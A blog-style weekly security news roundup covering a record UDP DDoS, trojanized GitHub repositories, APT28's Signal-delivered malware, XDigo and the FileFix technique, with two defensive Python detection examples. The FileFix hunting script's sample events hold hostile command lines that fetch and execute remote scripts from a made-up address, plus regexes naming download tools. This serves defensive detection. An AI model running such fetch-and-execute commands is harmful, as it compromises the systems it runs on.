Shoutout to the defenders out there who work day and night to inform us about malware, cyberattacks, the methods attackers use to compromise end users, and much more.
To the reader of this series, my introduction should have revealed what we’re about to review. If not, you can read the intro again or read on to find out.
Record DDoS pummels site with once-unimaginable 7.3Tbps of junk traffic
That’s a lot. It also shows how far attackers will go when they intend to knock a website offline in a DDoS attack. Luckily for the unnamed target, Cloudflare came to the rescue.
From the article:
The vast majority of the attack was delivered in the form of User Datagram Protocol packets. UDP flood attacks send extremely high volumes of packets to random or specific ports on the target IP. Such floods can saturate the target’s Internet link or overwhelm internal resources with more packets than they can handle.
Cloudflare said the attack was also delivered through one or more Mirai-based botnets. Such botnets are typically made up of home and small office routers, web cameras, and other Internet of Things devices that have been compromised.
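Since the quoted paragraph explains what a UDP flood looks like on the wire (a packet rate no service behind the link could handle, aimed at random or specific ports), here is an added example of the simplest check that follows from it: a rate-based detector run over flow records. This is my own illustration, not Cloudflare's code; the flow records, the victim address 203.0.113.10, the packet-rate threshold, the 1 Gbps link and the ten-port cutoff for calling a flood a port spray are all constructed assumptions.

```python
"""Rate-based UDP flood detector run over constructed flow records.

Added example: the records, thresholds and link capacity are made up for
illustration and are not taken from Cloudflare's report.
"""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Flow:
    ts: int        # epoch second at which the flow record was exported
    src: str       # source IP
    dst: str       # destination (victim) IP
    proto: str     # "udp" or "tcp"
    dport: int     # destination port
    packets: int
    bytes: int


def bucket_udp(flows, window=1):
    """Aggregate UDP traffic per (destination, window start) bucket."""
    buckets = defaultdict(lambda: {"packets": 0, "bytes": 0,
                                   "ports": set(), "sources": set()})
    for f in flows:
        if f.proto != "udp":
            continue
        key = (f.dst, f.ts - f.ts % window)
        b = buckets[key]
        b["packets"] += f.packets
        b["bytes"] += f.bytes
        b["ports"].add(f.dport)
        b["sources"].add(f.src)
    return buckets


def detect_udp_flood(flows, pps_threshold, link_bps, window=1,
                     random_port_cutoff=10):
    """Flag buckets whose UDP rate exceeds pps_threshold or 80% of link_bps.

    random_port_cutoff is a heuristic (assumption): more distinct destination
    ports than this in one bucket is reported as a port spray rather than a
    flood aimed at one service.
    """
    alerts = []
    for (dst, start), b in sorted(bucket_udp(flows, window).items()):
        pps = b["packets"] / window
        bps = b["bytes"] * 8 / window
        saturated = bps >= 0.8 * link_bps
        if pps < pps_threshold and not saturated:
            continue
        alerts.append({
            "dst": dst,
            "second": start,
            "pps": pps,
            "bps": bps,
            "distinct_ports": len(b["ports"]),
            "distinct_sources": len(b["sources"]),
            "port_pattern": "random" if len(b["ports"]) >= random_port_cutoff else "specific",
            "link_saturated": saturated,
        })
    return alerts


VICTIM = "203.0.113.10"  # constructed victim address

# Constructed records: one quiet second, then two flood seconds.
SAMPLE_FLOWS = [
    Flow(100, "10.0.0.5", VICTIM, "udp", 53, 20, 2_000),
    Flow(100, "10.0.0.6", VICTIM, "udp", 123, 5, 380),
    Flow(100, "10.0.0.7", VICTIM, "tcp", 443, 900, 1_200_000),
]
# Second 101: 50 sources spraying distinct high ports (200,000 pps, 2.24 Gbps).
SAMPLE_FLOWS += [
    Flow(101, f"198.51.100.{i}", VICTIM, "udp", 1024 + 37 * i, 4_000, 4_000 * 1_400)
    for i in range(50)
]
# Second 102: 30 sources hammering a single port (90,000 pps, 864 Mbps).
SAMPLE_FLOWS += [
    Flow(102, f"192.0.2.{i}", VICTIM, "udp", 443, 3_000, 3_000 * 1_200)
    for i in range(30)
]

if __name__ == "__main__":
    for a in detect_udp_flood(SAMPLE_FLOWS, pps_threshold=50_000, link_bps=1_000_000_000):
        print(a)
```

The two alert conditions mirror the two outcomes the quote names: the packet-rate check catches floods that overwhelm internal resources even when the link is not full, and the bytes-per-second check catches link saturation even when packets are large and relatively few. Whether the hit ports look random or specific tells you whether the victim can drop the traffic at the edge by port or has to rely on upstream scrubbing.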
200+ Trojanized GitHub Repositories Found in Campaign Targeting Gamers and Developers
There are two talking points in this article. First, threat actors are using GitHub as a malware distribution hub. Second, the targets are gamers and developers.
Now, if you’re a developer or gamer and you use GitHub (occasionally or frequently), don’t download and execute any code from GitHub without careful inspection, and that inspection has to cover build hooks and bundled scripts, not just the source files you intend to use. You have been warned.
From the article:
The identified repositories act as a conduit for four different kinds of backdoors that are embedded within Visual Studio PreBuild events, Python scripts, screensaver files, and JavaScript to steal data, take screenshots, communicate via Telegram, as well as fetch more payloads, including AsyncRAT, Remcos RAT, and Lumma Stealer.
APT28 hackers use Signal chats to launch new malware attacks on Ukraine
Calm down: this is not a Signal flaw. Attackers are simply using Signal as a delivery channel in their phishing attacks because of its popularity. In this campaign, the attackers send their targets a malicious document that delivers Covenant, a memory-resident backdoor.
Covenant works as follows:
Covenant acts as a malware loader, downloading a DLL (PlaySndSrv.dll) and a shellcode-ridden WAV file (sample-03.wav) that loads BeardShell, a previously undocumented C++ malware.
BeardShell’s main functionality is to download PowerShell scripts, decrypt them using ChaCha20-Poly1305, and execute them. The execution results are exfiltrated to the command-and-control (C2) server, the communication with which is facilitated by Icedrive API.
XDigo Malware Exploits Windows LNK Flaw in Eastern European Government Attacks
Attackers have a history of using flaws in Microsoft Windows against their targets, and this campaign is no exception. Here, they are abusing an LNK flaw disclosed in March 2025 by Trend Micro.
The following details the capabilities of the XDigo malware:
XDigo is a stealer that can harvest files, extract clipboard content, and capture screenshots. It also supports commands to execute a command or binary retrieved from a remote server over HTTP GET requests. Data exfiltration occurs via HTTP POST requests.
New FileFix attack weaponizes Windows File Explorer for stealthy commands
Have you heard of the ClickFix attack? FileFix is a variant of it. At the time of writing, though, it exists only as research by security researcher mr.d0x, meaning that by the time you read this, attackers could have weaponized it in real attacks in the wild.
So, what is FileFix all about? It’s the following:
FileFix, a variation of the social-engineering attack called ClickFix, allows threat actors to execute commands on the victim system through the File Explorer address bar in Windows.
FileFix attacks also rely on a phishing page, but the ruse is no longer presented as an error or issue. Instead, it may appear as a notification indicating that a file has been shared with the user and includes a request to paste the path into File Explorer to locate it.
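The description above hands a defender one concrete thing to hunt for: a command interpreter whose parent is explorer.exe, since File Explorer, address bar included, runs as that process. Below is an added example of such a hunt over process-creation events. It is my illustration and not code from mr.d0x or from the article; the events are constructed in the shape of Sysmon process-creation logs, the address 203.0.113.7 is made up, and the interpreter set, the indicator patterns and the two-indicator threshold are tuning assumptions rather than a published rule.

```python
"""Hunt for command interpreters spawned by the File Explorer process.

Added example, not from the FileFix write-up: the events are constructed in
the shape of Sysmon process-creation logs, and the indicator list and the
two-indicator threshold are tuning assumptions, not a published rule.
"""
import re
from pathlib import PureWindowsPath

# Interpreters a pasted address-bar string could end up launching (assumed set).
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                "wscript.exe", "cscript.exe"}

# Command-line indicators; each name is reported when its pattern matches.
INDICATORS = [
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I)),
    ("encoded_command", re.compile(r"-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("remote_fetch", re.compile(r"https?://|invoke-webrequest|\biwr\b|downloadstring|\bcurl\b|bitsadmin", re.I)),
    ("policy_bypass", re.compile(r"-e(?:xecution)?p(?:olicy)?\s+bypass", re.I)),
]


def _name(path):
    """Lower-cased file name of a Windows path, e.g. 'explorer.exe'."""
    return PureWindowsPath(path).name.lower()


def score_event(ev):
    """Return matched indicator names, or None if the lineage is not of interest."""
    if _name(ev["ParentImage"]) != "explorer.exe":
        return None
    if _name(ev["Image"]) not in INTERPRETERS:
        return None
    return [name for name, rx in INDICATORS if rx.search(ev["CommandLine"])]


def hunt(events, min_indicators=2):
    """Report explorer.exe -> interpreter launches with enough indicators.

    Users also start PowerShell from Explorer legitimately, so a bare launch
    scores zero; min_indicators is the noise knob (assumed default of 2).
    """
    findings = []
    for ev in events:
        hits = score_event(ev)
        if hits is not None and len(hits) >= min_indicators:
            findings.append({"pid": ev["ProcessId"],
                             "image": _name(ev["Image"]),
                             "indicators": hits})
    return findings


SAMPLE_EVENTS = [  # constructed, Sysmon Event ID 1 style fields
    {"ProcessId": 4120,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell.exe -w hidden -ep bypass -c "iwr http://203.0.113.7/a.ps1 | iex"'},
    {"ProcessId": 4188,  # ordinary Explorer child, not an interpreter
     "Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\System32\notepad.exe" C:\Users\alice\notes.txt'},
    {"ProcessId": 4302,  # suspicious, but wrong parent for this hunt
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": 'powershell.exe -c "iwr http://203.0.113.7/b.ps1"'},
    {"ProcessId": 4555,  # user opening PowerShell from Explorer: zero indicators
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe"},
    {"ProcessId": 4987,  # one indicator only; surfaces when the threshold is lowered
     "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "mshta.exe https://203.0.113.7/x.hta"},
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f)
```

With the default threshold only the hidden, policy-bypassing download chain is reported; dropping min_indicators to 1 also surfaces the mshta launch that fetches a remote HTA, at the cost of more noise. In a real environment you would feed this the same fields from your EDR or Sysmon pipeline and tune the indicator list against a week of baseline explorer.exe children before alerting on it.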
Credits
Cover photo by Debby Hudson on Unsplash.
That’s it for this week, and I’ll see you next time.